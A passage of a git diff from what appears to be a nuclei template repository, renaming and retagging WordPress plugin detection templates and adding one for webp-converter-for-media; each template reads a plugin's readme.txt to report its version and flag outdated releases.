helpers/wordpress/plugins/shortpixel-image-optimiser.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-simple-custom-post-order.yaml b/technologies/wordpress/plugins/simple-custom-post-order.yaml similarity index 87% rename from technologies/wordpress/wordpress-simple-custom-post-order.yaml rename to technologies/wordpress/plugins/simple-custom-post-order.yaml index f454707b14..9e8cb7dc95 100644 --- a/technologies/wordpress/wordpress-simple-custom-post-order.yaml +++ b/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -1,7 +1,7 @@ id: wordpress-simple-custom-post-order info: - name: "Simple Custom Post Order Detection" + name: Simple Custom Post Order Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/simple-custom-post-order/readme.txt" payloads: - last_version: wordpress-simple-custom-post-order.txt + last_version: helpers/wordpress/plugins/simple-custom-post-order.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-simple-page-ordering.yaml b/technologies/wordpress/plugins/simple-page-ordering.yaml similarity index 87% rename from technologies/wordpress/wordpress-simple-page-ordering.yaml rename to technologies/wordpress/plugins/simple-page-ordering.yaml index 6c518e9349..dd8d548954 100644 --- a/technologies/wordpress/wordpress-simple-page-ordering.yaml +++ b/technologies/wordpress/plugins/simple-page-ordering.yaml @@ -1,7 +1,7 @@ id: wordpress-simple-page-ordering info: - name: "Simple Page Ordering Detection" + name: Simple Page Ordering Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: simple-page-ordering wpscan: https://wpscan.com/plugin/simple-page-ordering - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/simple-page-ordering/readme.txt" payloads: - last_version: wordpress-simple-page-ordering.txt + last_version: helpers/wordpress/plugins/simple-page-ordering.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-siteguard.yaml b/technologies/wordpress/plugins/siteguard.yaml similarity index 87% rename from technologies/wordpress/wordpress-siteguard.yaml rename to technologies/wordpress/plugins/siteguard.yaml index 95e27e9467..fd8f662036 100644 --- a/technologies/wordpress/wordpress-siteguard.yaml +++ b/technologies/wordpress/plugins/siteguard.yaml @@ -1,7 +1,7 @@ id: wordpress-siteguard info: - name: "SiteGuard WP Plugin Detection" + name: SiteGuard WP Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/siteguard/readme.txt" payloads: - last_version: wordpress-siteguard.txt + last_version: helpers/wordpress/plugins/siteguard.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-siteorigin-panels.yaml b/technologies/wordpress/plugins/siteorigin-panels.yaml similarity index 86% rename from technologies/wordpress/wordpress-siteorigin-panels.yaml rename to technologies/wordpress/plugins/siteorigin-panels.yaml index 261de94078..689a02aaa2 100644 --- a/technologies/wordpress/wordpress-siteorigin-panels.yaml +++ b/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -1,7 +1,7 @@ id: wordpress-siteorigin-panels info: - name: "Page Builder by SiteOrigin Detection" + name: Page Builder by SiteOrigin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/siteorigin-panels/readme.txt" payloads: - last_version: wordpress-siteorigin-panels.txt + last_version: helpers/wordpress/plugins/siteorigin-panels.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-smart-slider-3.yaml b/technologies/wordpress/plugins/smart-slider-3.yaml similarity index 87% rename from technologies/wordpress/wordpress-smart-slider-3.yaml rename to technologies/wordpress/plugins/smart-slider-3.yaml index 1f0788d50d..ea5c2cd7a4 100644 --- a/technologies/wordpress/wordpress-smart-slider-3.yaml +++ b/technologies/wordpress/plugins/smart-slider-3.yaml @@ -1,7 +1,7 @@ id: wordpress-smart-slider-3 info: - name: "Smart Slider 3 Detection" + name: Smart Slider 3 Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/smart-slider-3/readme.txt" payloads: - last_version: wordpress-smart-slider-3.txt + last_version: helpers/wordpress/plugins/smart-slider-3.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-so-widgets-bundle.yaml b/technologies/wordpress/plugins/so-widgets-bundle.yaml similarity index 86% rename from technologies/wordpress/wordpress-so-widgets-bundle.yaml rename to technologies/wordpress/plugins/so-widgets-bundle.yaml index 75159dfbb2..c919376d74 100644 --- a/technologies/wordpress/wordpress-so-widgets-bundle.yaml +++ b/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -1,7 +1,7 @@ id: wordpress-so-widgets-bundle info: - name: "SiteOrigin Widgets Bundle Detection" + name: SiteOrigin Widgets Bundle Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/so-widgets-bundle/readme.txt" payloads: - last_version: wordpress-so-widgets-bundle.txt + last_version: helpers/wordpress/plugins/so-widgets-bundle.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml b/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml similarity index 86% rename from technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml rename to technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml index 0cf3c465e5..c54163a261 100644 --- a/technologies/wordpress/wordpress-ssl-insecure-content-fixer.yaml +++ b/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml @@ -1,7 +1,7 @@ id: wordpress-ssl-insecure-content-fixer info: - name: "SSL Insecure Content Fixer Detection" + name: SSL Insecure Content Fixer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ssl-insecure-content-fixer wpscan: https://wpscan.com/plugin/ssl-insecure-content-fixer - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ssl-insecure-content-fixer/readme.txt" payloads: - last_version: wordpress-ssl-insecure-content-fixer.txt + last_version: helpers/wordpress/plugins/ssl-insecure-content-fixer.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml b/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml similarity index 87% rename from technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml rename to technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 60d88eded6..e60c43d148 100644 --- a/technologies/wordpress/wordpress-stops-core-theme-and-plugin-updates.yaml +++ b/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -1,7 +1,7 @@ id: wordpress-stops-core-theme-and-plugin-updates info: - name: "Easy Updates Manager Detection" + name: Easy Updates Manager Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/stops-core-theme-and-plugin-updates/readme.txt" payloads: - last_version: wordpress-stops-core-theme-and-plugin-updates.txt + last_version: helpers/wordpress/plugins/stops-core-theme-and-plugin-updates.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-sucuri-scanner.yaml b/technologies/wordpress/plugins/sucuri-scanner.yaml similarity index 83% rename from technologies/wordpress/wordpress-sucuri-scanner.yaml rename to technologies/wordpress/plugins/sucuri-scanner.yaml index 174f8c171e..6227d9478a 100644 --- a/technologies/wordpress/wordpress-sucuri-scanner.yaml +++ b/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -1,7 +1,7 @@ id: wordpress-sucuri-scanner info: - name: "Sucuri Security – Auditing, Malware Scanner and Security Hardening Detection" + name: Sucuri Security – Auditing, Malware Scanner and Security Hardening Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/sucuri-scanner/readme.txt" payloads: - last_version: wordpress-sucuri-scanner.txt + last_version: helpers/wordpress/plugins/sucuri-scanner.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-svg-support.yaml b/technologies/wordpress/plugins/svg-support.yaml similarity index 87% rename from technologies/wordpress/wordpress-svg-support.yaml rename to technologies/wordpress/plugins/svg-support.yaml index a3cb418440..a9dfa6a0cb 100644 --- a/technologies/wordpress/wordpress-svg-support.yaml +++ b/technologies/wordpress/plugins/svg-support.yaml @@ -1,7 +1,7 @@ id: wordpress-svg-support info: - name: "SVG Support Detection" + name: SVG Support Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/svg-support/readme.txt" payloads: - last_version: wordpress-svg-support.txt + last_version: helpers/wordpress/plugins/svg-support.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-table-of-contents-plus.yaml b/technologies/wordpress/plugins/table-of-contents-plus.yaml similarity index 87% rename from technologies/wordpress/wordpress-table-of-contents-plus.yaml rename to technologies/wordpress/plugins/table-of-contents-plus.yaml index 131949d219..b02ebb47c6 100644 --- a/technologies/wordpress/wordpress-table-of-contents-plus.yaml +++ b/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -1,7 +1,7 @@ id: wordpress-table-of-contents-plus info: - name: "Table of Contents Plus Detection" + name: Table of Contents Plus Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/table-of-contents-plus/readme.txt" payloads: - last_version: wordpress-table-of-contents-plus.txt + last_version: helpers/wordpress/plugins/table-of-contents-plus.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-tablepress.yaml b/technologies/wordpress/plugins/tablepress.yaml similarity index 87% rename from technologies/wordpress/wordpress-tablepress.yaml rename to technologies/wordpress/plugins/tablepress.yaml index 931b9961f9..c152065053 100644 --- a/technologies/wordpress/wordpress-tablepress.yaml +++ b/technologies/wordpress/plugins/tablepress.yaml @@ -1,7 +1,7 @@ id: wordpress-tablepress info: - name: "TablePress Detection" + name: TablePress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/tablepress/readme.txt" payloads: - last_version: wordpress-tablepress.txt + last_version: helpers/wordpress/plugins/tablepress.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml b/technologies/wordpress/plugins/taxonomy-terms-order.yaml similarity index 86% rename from technologies/wordpress/wordpress-taxonomy-terms-order.yaml rename to technologies/wordpress/plugins/taxonomy-terms-order.yaml index 602aa899ad..7839533f1f 100644 --- a/technologies/wordpress/wordpress-taxonomy-terms-order.yaml +++ b/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -1,7 +1,7 @@ id: wordpress-taxonomy-terms-order info: - name: "Category Order and Taxonomy Terms Order Detection" + name: Category Order and Taxonomy Terms Order Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/taxonomy-terms-order/readme.txt" payloads: - last_version: wordpress-taxonomy-terms-order.txt + last_version: helpers/wordpress/plugins/taxonomy-terms-order.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-the-events-calendar.yaml b/technologies/wordpress/plugins/the-events-calendar.yaml similarity index 86% rename from technologies/wordpress/wordpress-the-events-calendar.yaml rename to technologies/wordpress/plugins/the-events-calendar.yaml index 69c95304f7..ec19bd8508 100644 --- a/technologies/wordpress/wordpress-the-events-calendar.yaml +++ b/technologies/wordpress/plugins/the-events-calendar.yaml @@ -1,7 +1,7 @@ id: wordpress-the-events-calendar info: - name: "The Events Calendar Detection" + name: The Events Calendar Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/the-events-calendar/readme.txt" payloads: - last_version: wordpress-the-events-calendar.txt + last_version: helpers/wordpress/plugins/the-events-calendar.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-themeisle-companion.yaml b/technologies/wordpress/plugins/themeisle-companion.yaml similarity index 87% rename from technologies/wordpress/wordpress-themeisle-companion.yaml rename to technologies/wordpress/plugins/themeisle-companion.yaml index a490dcc7c1..b337cab2d3 100644 --- a/technologies/wordpress/wordpress-themeisle-companion.yaml +++ b/technologies/wordpress/plugins/themeisle-companion.yaml @@ -1,7 +1,7 @@ id: wordpress-themeisle-companion info: - name: "Orbit Fox by ThemeIsle Detection" + name: Orbit Fox by ThemeIsle Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/themeisle-companion/readme.txt" payloads: - last_version: wordpress-themeisle-companion.txt + last_version: helpers/wordpress/plugins/themeisle-companion.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-tinymce-advanced.yaml b/technologies/wordpress/plugins/tinymce-advanced.yaml similarity index 84% rename from technologies/wordpress/wordpress-tinymce-advanced.yaml rename to technologies/wordpress/plugins/tinymce-advanced.yaml index 08c1de537a..5b0b72f627 100644 --- a/technologies/wordpress/wordpress-tinymce-advanced.yaml +++ b/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -1,7 +1,7 @@ id: wordpress-tinymce-advanced info: - name: "Advanced Editor Tools (previously TinyMCE Advanced) Detection" + name: Advanced Editor Tools (previously TinyMCE Advanced) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" payloads: - last_version: wordpress-tinymce-advanced.txt + last_version: helpers/wordpress/plugins/tinymce-advanced.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.yaml b/technologies/wordpress/plugins/translatepress-multilingual.yaml similarity index 85% rename from technologies/wordpress/wordpress-translatepress-multilingual.yaml rename to technologies/wordpress/plugins/translatepress-multilingual.yaml index c0a64bf9bc..b426e45b91 100644 --- a/technologies/wordpress/wordpress-translatepress-multilingual.yaml +++ b/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -1,7 +1,7 @@ id: wordpress-translatepress-multilingual info: - name: "Translate Multilingual sites – TranslatePress Detection" + name: Translate Multilingual sites – TranslatePress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" payloads: - last_version: wordpress-translatepress-multilingual.txt + last_version: helpers/wordpress/plugins/translatepress-multilingual.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml similarity index 86% rename from technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml rename to technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index c390dafde0..c69801fa65 100644 --- a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml +++ b/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -1,7 +1,7 @@ id: wordpress-ultimate-addons-for-gutenberg info: - name: "Spectra – WordPress Gutenberg Blocks Detection" + name: Spectra – WordPress Gutenberg Blocks Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" payloads: - last_version: wordpress-ultimate-addons-for-gutenberg.txt + last_version: helpers/wordpress/plugins/ultimate-addons-for-gutenberg.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-under-construction-page.yaml b/technologies/wordpress/plugins/under-construction-page.yaml similarity index 87% rename from technologies/wordpress/wordpress-under-construction-page.yaml rename to technologies/wordpress/plugins/under-construction-page.yaml index f5976c95e2..63531f0167 100644 --- a/technologies/wordpress/wordpress-under-construction-page.yaml +++ b/technologies/wordpress/plugins/under-construction-page.yaml @@ -1,7 +1,7 @@ id: wordpress-under-construction-page info: - name: "Under Construction Detection" + name: Under Construction Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" payloads: - last_version: wordpress-under-construction-page.txt + last_version: helpers/wordpress/plugins/under-construction-page.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-unyson.yaml b/technologies/wordpress/plugins/unyson.yaml similarity index 88% rename from technologies/wordpress/wordpress-unyson.yaml rename to technologies/wordpress/plugins/unyson.yaml index 4cdeb2c64b..e9304bcbb3 100644 --- a/technologies/wordpress/wordpress-unyson.yaml +++ b/technologies/wordpress/plugins/unyson.yaml @@ -1,7 +1,7 @@ id: wordpress-unyson info: - name: "Unyson Detection" + name: Unyson Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: unyson wpscan: https://wpscan.com/plugin/unyson - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" payloads: - last_version: wordpress-unyson.txt + last_version: helpers/wordpress/plugins/unyson.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-updraftplus.yaml b/technologies/wordpress/plugins/updraftplus.yaml similarity index 85% rename from technologies/wordpress/wordpress-updraftplus.yaml rename to technologies/wordpress/plugins/updraftplus.yaml index 624dd2eed9..5d410b8f04 100644 --- a/technologies/wordpress/wordpress-updraftplus.yaml +++ b/technologies/wordpress/plugins/updraftplus.yaml @@ -1,7 +1,7 @@ id: wordpress-updraftplus info: - name: "UpdraftPlus WordPress Backup Plugin Detection" + name: UpdraftPlus WordPress Backup Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" payloads: - last_version: wordpress-updraftplus.txt + last_version: helpers/wordpress/plugins/updraftplus.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-use-any-font.yaml b/technologies/wordpress/plugins/use-any-font.yaml similarity index 86% rename from technologies/wordpress/wordpress-use-any-font.yaml rename to technologies/wordpress/plugins/use-any-font.yaml index 19842cf7fb..cf99ac8252 100644 --- a/technologies/wordpress/wordpress-use-any-font.yaml +++ b/technologies/wordpress/plugins/use-any-font.yaml @@ -1,7 +1,7 @@ id: wordpress-use-any-font info: - name: "Use Any Font | Custom Font Uploader Detection" + name: Use Any Font | Custom Font Uploader Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" payloads: - last_version: wordpress-use-any-font.txt + last_version: helpers/wordpress/plugins/use-any-font.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-user-role-editor.yaml b/technologies/wordpress/plugins/user-role-editor.yaml similarity index 87% rename from technologies/wordpress/wordpress-user-role-editor.yaml rename to technologies/wordpress/plugins/user-role-editor.yaml index 04e13d882d..b8818494b0 100644 --- a/technologies/wordpress/wordpress-user-role-editor.yaml +++ b/technologies/wordpress/plugins/user-role-editor.yaml @@ -1,7 +1,7 @@ id: wordpress-user-role-editor info: - name: "User Role Editor Detection" + name: User Role Editor Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" payloads: - last_version: wordpress-user-role-editor.txt + last_version: helpers/wordpress/plugins/user-role-editor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml b/technologies/wordpress/plugins/velvet-blues-update-urls.yaml similarity index 87% rename from technologies/wordpress/wordpress-velvet-blues-update-urls.yaml rename to technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 094c3f5064..fe8f6e9c78 100644 --- a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml +++ b/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -1,7 +1,7 @@ id: wordpress-velvet-blues-update-urls info: - name: "Velvet Blues Update URLs Detection" + name: Velvet Blues Update URLs Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" payloads: - last_version: wordpress-velvet-blues-update-urls.txt + last_version: helpers/wordpress/plugins/velvet-blues-update-urls.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-w3-total-cache.yaml b/technologies/wordpress/plugins/w3-total-cache.yaml similarity index 87% rename from technologies/wordpress/wordpress-w3-total-cache.yaml rename to technologies/wordpress/plugins/w3-total-cache.yaml index 56568bf21a..28aaf3601e 100644 --- a/technologies/wordpress/wordpress-w3-total-cache.yaml +++ b/technologies/wordpress/plugins/w3-total-cache.yaml @@ -1,7 +1,7 @@ id: wordpress-w3-total-cache info: - name: "W3 Total Cache Detection" + name: W3 Total Cache Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" payloads: - last_version: wordpress-w3-total-cache.txt + last_version: helpers/wordpress/plugins/w3-total-cache.txt extractors: - type: regex diff --git a/technologies/wordpress/plugins/webp-converter-for-media.yaml b/technologies/wordpress/plugins/webp-converter-for-media.yaml new file mode 100644 index 0000000000..ccda923042 --- /dev/null +++ b/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -0,0 +1,50 @@ +id: wordpress-webp-converter-for-media + +info: + name: Converter for Media – Optimize images | Convert WebP & AVIF Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/webp-converter-for-media/ + metadata: + plugin_namespace: webp-converter-for-media + wpscan: https://wpscan.com/plugin/webp-converter-for-media + tags: tech,wordpress,wp-plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/readme.txt" + + payloads: + last_version: helpers/wordpress/plugins/webp-converter-for-media.txt + + extractors: + - type: regex + part: body + internal: true + name: internal_detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.yaml b/technologies/wordpress/plugins/widget-importer-exporter.yaml similarity index 86% rename from technologies/wordpress/wordpress-widget-importer-exporter.yaml rename to technologies/wordpress/plugins/widget-importer-exporter.yaml index 5f55d031f8..68cef2ecf9 100644 --- a/technologies/wordpress/wordpress-widget-importer-exporter.yaml +++ b/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -1,7 +1,7 @@ id: wordpress-widget-importer-exporter info: - name: "Widget Importer & Exporter Detection" + name: Widget Importer & Exporter Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" payloads: - last_version: wordpress-widget-importer-exporter.txt + last_version: helpers/wordpress/plugins/widget-importer-exporter.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml b/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml similarity index 86% rename from technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml rename to technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index de083db049..edaed432e4 100644 --- a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml +++ b/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -1,7 +1,7 @@ id: wordpress-woo-cart-abandonment-recovery info: - name: "WooCommerce Cart Abandonment Recovery Detection" + name: WooCommerce Cart Abandonment Recovery Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" payloads: - last_version: wordpress-woo-cart-abandonment-recovery.txt + last_version: helpers/wordpress/plugins/woo-cart-abandonment-recovery.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml b/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml 